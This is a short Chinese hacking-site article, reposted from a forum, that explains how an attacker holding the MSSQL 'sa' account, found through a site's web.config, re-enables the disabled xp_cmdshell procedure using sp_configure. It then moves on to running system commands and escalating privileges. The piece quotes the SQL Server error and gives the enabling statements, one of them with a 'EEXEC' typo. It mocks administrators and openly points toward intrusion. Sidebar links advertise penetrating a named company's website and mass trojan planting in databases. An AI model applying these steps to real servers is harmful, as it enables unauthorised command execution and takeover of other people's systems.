刀城技术网-信息安全,服务器安全维护,网站安全维护

当前位置: 网站主页 > 数据安全 > MSSQL注入 >

MSSQL数据库sa账户xp_cmdshell解除禁用

时间:2012-06-05 22:41来源:http://bbs.blackbap.org 作者:Mr.Cool 点击:
作者:Mr.Cool 原文地址: http://bbs.blackbap.org/thread-2459-1-2.html 是有那么一些傻逼点的管理员,在aspx的站上面的配置文件web.config中配置上sa账户 然后。。。sa还禁用了xp_cmdshell 比方说: 使用xp_cmdshell执行命令的时候,系统回显如下: Micro
作者:Mr.Cool
原文地址:
http://bbs.blackbap.org/thread-2459-1-2.html


是有那么一些傻逼点的管理员,在aspx的站上面的配置文件web.config中配置上sa账户
然后。。。sa还禁用了xp_cmdshell

比方说:

1.png

使用xp_cmdshell执行命令的时候,系统回显如下:
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

既然是sa,就没有办不到的
  1. EEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
执行这句SQL就把xp_cmdshell开启了
估计管理员是把上面语句的1换成了0执行的
  1. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
这样就会显示上面的系统错误了。

2.png

禁用解除,执行命令,提权。。。后面你懂的(责任编辑:刀)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
栏目列表
推荐内容
  • 渗透居然之家网站

    前言 在用百度mp3听音乐的时候,看到了一个叫居然家居的公司的广告,百度了一下,做的...

  • Sa提权sql语句大全

    看文章中有提到lake2,文章应当是他写的吧。我稍微整理了一下,by daokers...

  • 清理数据库批量挂马

    数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公...